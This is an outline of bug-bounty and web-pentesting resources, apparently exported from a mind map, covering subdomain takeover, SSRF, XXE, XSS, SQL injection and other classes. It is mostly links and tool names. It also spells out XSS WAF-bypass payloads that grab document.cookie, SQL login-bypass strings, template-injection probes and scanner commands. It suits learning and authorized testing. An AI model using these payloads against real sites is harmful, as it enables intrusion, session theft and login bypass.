1. Email spoofing vulnerabilities
1.1. Mxtoolbox
1.2. Mail spoofer
2. Subdomain enumeration & takeover
2.1. Blogs
2.1.1. POC
2.1.1.1. Subdomain takeover PoCs
2.1.1.1.1. GitHub - https://hackerone.com/reports/363778
2.1.1.1.2. AWS - https://hackerone.com/reports/186766
2.1.1.1.3. Zendesk - https://hackerone.com/reports/759454
2.1.1.1.4. Azure - https://hackerone.com/reports/665398
2.1.1.1.5. Uptime Robot - https://hackerone.com/reports/781614
2.1.1.1.6. fly.io - https://hackerone.com/reports/576857
2.1.1.1.7. icn.bg - https://hackerone.com/hacker_dashboard/overview
2.1.1.1.8. Azure Traffic Manager - https://hackerone.com/reports/570651
2.1.1.1.9. tilda.cc - https://hackerone.com/reports/720992
2.1.1.1.10. Netlify - https://hackerone.com/reports/197489
2.1.1.1.11. Mashery service - https://hackerone.com/reports/275714
2.1.1.1.12. Fastly - https://hackerone.com/reports/154425
2.1.1.1.13. Heroku - https://hackerone.com/reports/365853
2.1.1.1.14. Unbounce Pages - https://hackerone.com/reports/209004
2.1.1.1.15. Tumblr - https://hackerone.com/reports/221631
2.1.1.1.16. Shopify - https://hackerone.com/reports/416474
2.1.1.1.17. ghost.io - https://hackerone.com/reports/368119
2.1.1.1.18. CloudFront (CF origin) - https://hackerone.com/reports/145224
2.1.1.1.19. legacy - https://hackerone.com/reports/389783
2.1.1.1.20. WordPress - https://hackerone.com/reports/274336
2.1.1.1.21. Desk - https://hackerone.com/reports/201796
2.1.2. Edoverflow
2.1.3. patrik
2.2. Tools
2.2.1. Online tools
2.2.1.1. Cyberint
2.2.1.2. Hackking
2.2.1.3. Sub enumeration
2.2.1.4. Virustotal
2.2.2. Offline tools
2.2.2.1. Amass
2.2.2.1.1. Basic-usage: [amass enum -d example.com]
2.2.2.2. Aquatone
2.2.2.2.1. Basic-usage: [cat targets.txt | aquatone {or} type targets.txt | aquatone]
2.2.2.3. Massdns
2.2.2.3.1. Basic-usage: [./bin/massdns {options} {domainlist}]
2.2.2.4. Findomain
2.2.2.4.1. Basic-usage: [findomain -t example.com]
2.2.2.5. Assetfinder
2.2.3. Automation
2.2.3.1. Link 1
2.2.3.2. Link 2
3. SAML/SSO
3.1. Blogs
3.1.1. https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/
3.1.2. https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/
3.1.3. https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/
3.1.4. https://github.com/kelbyludwig/saml-attack-surface
3.1.5. http://secretsofappsecurity.blogspot.com/2017/01/saml-security-xml-external-entity-attack.html
3.1.6. https://seanmelia.wordpress.com/2016/01/09/xxe-via-saml/
3.1.7. https://hackerone.com/reports/136169
3.2. Burp Extensions
3.2.1. SAMLRaider
4. Directory enumeration
4.1. Wordlist
4.1.1. jhaddix
4.1.2. SecLists
4.2. Tools
4.2.1. Meg
4.2.2. ffuf
4.2.2.1. Basic-usage: [ffuf -w /path/to/wordlist -u https://target/FUZZ]
4.2.2.1.1. Fuzz file paths from wordlist.txt, match all responses but filter out those with content size 42; colored, verbose output: [ffuf -w wordlist.txt -u https://example.org/FUZZ -mc all -fs 42 -c -v]
4.2.2.1.2. Fuzz the Host header, match HTTP 200 responses: [ffuf -w hosts.txt -u https://example.org/ -H "Host: FUZZ" -mc 200]
4.2.2.1.3. Fuzz POST JSON data, match all responses not containing the text "error": [ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/json" -d '{"name": "FUZZ", "anotherkey": "anothervalue"}' -fr "error"]
4.2.2.1.4. Fuzz multiple locations, match only responses reflecting the value of the "VAL" keyword; colored: [ffuf -w params.txt:PARAM -w values.txt:VAL -u https://example.org/?PARAM=VAL -mr "VAL" -c]
4.2.3. Dirsearch
4.2.3.1. Basic-usage: [python3 dirsearch.py -u <URL> -e <EXTENSION>]
4.2.3.1.1. Options
4.2.3.1.1.1. -h, --help: show this help message and exit
4.2.3.1.1.2. Mandatory
4.2.3.1.1.2.1. -u URL, --url=URL: URL target
4.2.3.1.1.2.2. -L URLLIST, --url-list=URLLIST: URL list target
4.2.3.1.1.2.3. -e EXTENSIONS, --extensions=EXTENSIONS: extension list separated by comma (example: php,asp)
4.2.3.1.1.2.4. -E, --extensions-list: use predefined list of common extensions
4.2.3.1.1.3. Dictionary settings
4.2.3.1.1.3.1. -w WORDLIST, --wordlist=WORDLIST
4.2.3.1.1.3.2. -l, --lowercase
4.2.3.1.1.3.3. -f, --force-extensions: force extensions for every wordlist entry (like in DirBuster)
4.2.3.1.1.4. General settings
4.2.3.1.1.4.1. -s DELAY, --delay=DELAY: delay between requests (float number)
4.2.3.1.1.4.2. -r, --recursive: bruteforce recursively
4.2.3.1.1.4.3. -R RECURSIVE_LEVEL_MAX, --recursive-level-max=RECURSIVE_LEVEL_MAX: max recursion level (subdirs) (default: 1 [only rootdir + 1 dir])
4.2.3.1.1.4.4. --suppress-empty
4.2.3.1.1.4.5. --scan-subdir=SCANSUBDIRS, --scan-subdirs=SCANSUBDIRS: scan subdirectories of the given -u|--url (separated by comma)
4.2.3.1.1.4.6. --exclude-subdir=EXCLUDESUBDIRS, --exclude-subdirs=EXCLUDESUBDIRS: exclude the following subdirectories during recursive scan (separated by comma)
4.2.3.1.1.4.7. -t THREADSCOUNT, --threads=THREADSCOUNT: number of threads
4.2.3.1.1.4.8. -x EXCLUDESTATUSCODES, --exclude-status=EXCLUDESTATUSCODES: exclude status codes, separated by comma (example: 301,500)
4.2.3.1.1.4.9. --exclude-texts=EXCLUDETEXTS: exclude responses by texts, separated by comma (example: "Not found", "Error")
4.2.3.1.1.4.10. --exclude-regexps=EXCLUDEREGEXPS: exclude responses by regexps, separated by comma (example: "Not foun[a-z]{1}", "^Error$")
4.2.3.1.1.4.11. -c COOKIE, --cookie=COOKIE
4.2.3.1.1.4.12. --ua=USERAGENT, --user-agent=USERAGENT
4.2.3.1.1.4.13. -F, --follow-redirects
4.2.3.1.1.4.14. -H HEADERS, --header=HEADERS: headers to add (example: --header "Referer: example.com" --header "User-Agent: IE")
4.2.3.1.1.4.15. --random-agents, --random-user-agents
4.2.3.1.1.5. Connection settings
4.2.3.1.1.5.1. --timeout=TIMEOUT: connection timeout
4.2.3.1.1.5.2. --ip=IP: resolve name to IP address
4.2.3.1.1.5.3. --proxy=HTTPPROXY, --http-proxy=HTTPPROXY: HTTP proxy (example: localhost:8080)
4.2.3.1.1.5.4. --http-method=HTTPMETHOD: method to use (default: GET; also HEAD, POST)
4.2.3.1.1.5.5. --max-retries=MAXRETRIES
4.2.3.1.1.5.6. -b, --request-by-hostname: by default dirsearch requests by IP for speed; this forces requests by hostname
4.2.3.1.1.6. Reports
4.2.3.1.1.6.1. --simple-report=SIMPLEOUTPUTFILE: only found paths
4.2.3.1.1.6.2. --plain-text-report=PLAINTEXTOUTPUTFILE: found paths with status codes
4.2.3.1.1.6.3. --json-report=JSONOUTPUTFILE
4.2.4. wfuzz
5. SSRF
5.1. Online tools
5.1.1. ssrftest
5.1.2. postb.in
5.2. Github tools
5.2.1. httprebind
5.2.2. ssrftest
5.2.3. Ground control
5.2.4. SSRF map
5.3. Blogs & Payloads
5.3.1. https://github.com/jdonsec/AllThingsSSRF
5.3.2. https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b
5.3.3. https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978
5.3.4. https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0
6. CSRF
6.1. CSRF Bypass
6.1.1. Replacing value of same length
6.1.2. Removing the CSRF token from requests entirely
6.1.3. Decoding CSRF tokens
6.1.4. Extracting token via HTML injection
6.1.5. Using only the static parts of the token
6.1.6. Changing request method
6.1.7. Try to remove the referer header
6.2. Burp extension
6.2.1. EasyCSRF
6.3. JSON-Based CSRF
6.3.1. Blog 1
7. File Inclusion
7.1. RFI
7.2. LFI
7.3. GitHub References & Tools
7.3.1. LFISuite
7.3.2. liffy
7.3.3. fimap
7.4. Payloads
7.4.1. Set 1
7.4.2. Set 2
7.4.3. Set 3
7.4.4. Burp Intruder list
8. IDOR
8.1. Burp Extensions
8.1.1. Authz
8.1.2. AuthMatrix
8.1.3. Authorize
8.2. Blogs
8.2.1. Blog 1
8.2.2. Blog 2
8.2.3. Blog 3
9. XXE
9.1. Online tools
9.1.1. XXE.SH
9.2. Types
9.2.1. Inbound XML injection
9.2.2. OOB XML injection
9.2.3. Error-based XML injection
9.3. Github tools
9.3.1. oxml_xxe
9.3.2. XXEinjector
9.4. Blogs
9.4.1. https://0xatul.me/posts/2020/02/external-xml-entity-via-file-upload-svg/
9.4.2. https://mahmoudsec.blogspot.com/2019/08/exploiting-out-of-band-xxe-using.html
9.4.3. https://github.com/setuid0-sec/Swiss_E-Voting_Publications/blob/master/xxe_setuid0.pdf
9.4.4. https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
9.4.5. https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/
9.4.6. https://www.corben.io/XSS-to-XXE-in-Prince/
9.4.7. https://medium.com/@zain.sabahat/an-interesting-xxe-in-sap-8b35fec6ef33
10. Some Git repos, Burp extensions, etc.
10.1. Git repos
10.1.1. AWS offensive/defensive
10.1.2. Key hacks
10.1.3. Github Monitoring
10.1.4. Pentest-tools
10.2. Shodan monitoring
10.3. Burp extensions
10.3.1. HUNT
10.4. Blogs
10.4.1. pentester.land
11. Redirect
11.1. Online tools
11.1.1. Hackking
11.2. Blogs
11.2.1. Blog 1
12. VPS
12.1. Automated-Scanner
12.2. lazyrecon
12.3. Osmedeus
12.4. Sn1per
13. Insecure Deserialization
13.1. Blogs
13.1.1. Blog 1
13.1.2. Blog 2
13.1.3. Blog 3
13.1.4. Blog 4
13.2. Tools
13.2.1. Python pickle
13.2.2. gadgetinspector
13.2.3. ysoserial
13.3. Burp Extensions
13.3.1. Java-Deserialization-Scanner
13.3.2. JavaSerialKiller
13.3.3. burp-ysoserial
13.3.4. SuperSerial
13.3.5. SuperSerial-Active
14. Clickjacking
14.1. Tools and burp extensions
14.1.1. Clickbandit
15. Command Injection
15.1. Payloads
15.1.1. Set 1
15.1.2. Set 2
15.2. Tools
15.2.1. commix
15.2.2. Practice labs
15.3. Burp Extensions
15.3.1. Command Injection Attacker
16. Cross-site scripting (XSS)
16.1. Types
16.1.1. Stored-XSS
16.1.2. Reflected-XSS
16.1.3. DOM-XSS
16.1.4. Blind-XSS
16.1.4.1. XSS Hunter (The Best tool for Blind XSS)
16.1.4.2. ezXSS (Has 2FA, email reports, share reports feature)
16.1.4.3. bXSS (Has slack/SMS notification feature)
16.1.4.4. Knoxss (has email feature & plugin)
16.1.4.5. Burp Collaborator
16.2. Payloads
16.2.1. WAF Bypass
16.2.1.1. Kona WAF (Akamai) Bypass
16.2.1.1.1. \');confirm(1);//
16.2.1.2. ModSecurity WAF Bypass
16.2.1.2.1. <img src=x onerror=prompt(document.cookie) onerror=prompt(document.domain) onerror=prompt(document.domain)>
16.2.1.3. Incapsula WAF Bypasses
16.2.1.3.1. <iframe/onload='this["src"]="javas cript:al"+"ert""';>
16.2.1.3.2. <img/src=q onerror='new Function`al\ert\`1\"'>
16.2.1.4. Wordfence XSS Bypasses
16.2.1.4.1. <meter onmouseover="alert(1)"
16.2.1.4.2. '">><div><meter onmouseover="alert(1)"</div>"
16.2.1.4.3. >><marquee loop=1 width=0 onfinish=alert(1)>
16.2.2. XSS via file upload
16.2.2.1. XSS in file name
16.2.2.1.1. "><img src=v onerror=prompt(xss);>.jpeg
16.2.2.2. Metadata (exiftool)
16.2.2.2.1. exiftool -Artist=' "><img src=1 onerror=alert(document.domain)>' brute.jpeg
16.2.2.3. SVG content XSS
16.2.2.3.1. <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
16.2.2.4. Gif extension XSS
16.2.2.4.1. GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
16.2.2.5. Html extension
16.2.2.5.1. <!DOCTYPE html> <html> <head> <title>XSS</title> </head> <body> <script type="text/javascript">alert(document.cookie)</script> <script>prompt(1);</script> </body> </html>
16.2.3. Set 1
17. SQL Injection
17.1. Types
17.1.1. Union-based SQLi
17.1.2. Error-based SQLi
17.1.3. Blind SQLi
17.1.3.1. Boolean-based (content-based) Blind SQLi
17.1.3.2. Time-based Blind SQLi
17.1.4. Second-order SQL injection
17.1.4.1. end the query with "#" or "--"
17.1.5. Login SQLi
17.1.5.1. Login bypass payloads
17.1.5.1.1. SQL queries
17.1.5.1.1.1. SELECT * FROM users WHERE name='tom' and password='tom'
17.1.5.1.1.2. SELECT * FROM users WHERE name='tom' and password='' or '1'='1'
17.1.5.1.1.3. SELECT * FROM users WHERE name='tom' and password='' or 1='1'
17.1.5.1.1.4. SELECT * FROM users WHERE name='tom' and password='' or 1=1-- -'
17.1.5.1.1.5. SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'
17.1.5.1.1.6. SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1'
17.1.5.1.1.7. SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah'
17.2. Tools & extensions
17.2.1. Online tools
17.2.1.1. sql-injection-scanner-online
17.2.2. Offline tools
17.2.2.1. SQLmap
17.2.2.1.1. Basic usage: sqlmap.py -u xyz.com/vuln.php?id=1*
17.2.2.1.2. Adv usage: sqlmap.py -u xyz.com/vuln.php?id=1* --level 3 --risk 3
17.2.2.2. NoSQLMap
17.3. References
17.3.1. sqlwiki
17.3.2. pentest-tools
18. Web cache poisoning
19. HTTP request smuggling
19.1. Blogs
19.1.1. Blog 1
19.1.2. Blog 2
19.1.3. Blog 3
19.1.4. Blog 4
19.2. Concept
19.2.1. TE:CL
19.2.2. CL:TE
19.2.3. TE:TE
19.3. Tools
19.3.1. smuggler.py
19.4. Burp extensions
19.4.1. http-request-smuggler
20. CRLF Injection (%0d%0a)
20.1. Payloads
21. Unrestricted file upload
21.1. Tools
21.1.1. fuxploider
21.1.2. Burp extensions
21.1.2.1. Upload Scanner
21.2. Blogs
21.2.1. Blog 1
21.2.2. Blog 2
21.3. Payloads
21.3.1. Set 1
21.3.2. Set 2
21.3.3. Set 3
22. Template Injection
22.1. Tools
22.1.1. tplmap
22.2. Types
22.2.1. Twig
22.2.1.1. Payload: {{7*'7'}}
22.2.2. Jinja
22.2.2.1. Payload: {{7*'7'}}
22.2.3. Ruby
22.2.3.1. Payload: <%= 7 * 7 %>
22.3. Payloads & References
22.3.1. Set 1
22.3.2. Blog 1
23. Reporting Tool
23.1. Serpico
23.2. dradisframework
23.3. bountyplz
23.4. template-generator
24. Response manipulation
24.1. References
24.1.1. Ref 1
25. Git Recon
25.1. Tools
25.1.1. gitGraber
25.1.2. Gitrob
25.1.3. truffleHog
25.1.4. github-search
26. Practice Labs
26.1. Owasp broken web app
26.2. portswigger labs
26.3. SQL injection
26.4. XSS Labs
27. Race Condition
27.1. Blog 1
27.2. Blog 2
27.3. Blog 3
27.4. Blog 4
28. Browser Extensions
28.1. Tracy
28.2. Knoxss
28.3. Wappalyzer
28.4. d3coder
28.5. FoxyProxy
28.6. EditThisCookie
28.7. HTTP Headers
28.8. Postman Interceptor
29. Google dorks
29.1. References
29.1.1. GHDB
29.1.2. Bugbounty dorks
29.1.3. Blog 1
29.1.4. Blog 2
29.1.5. google_Dorks_list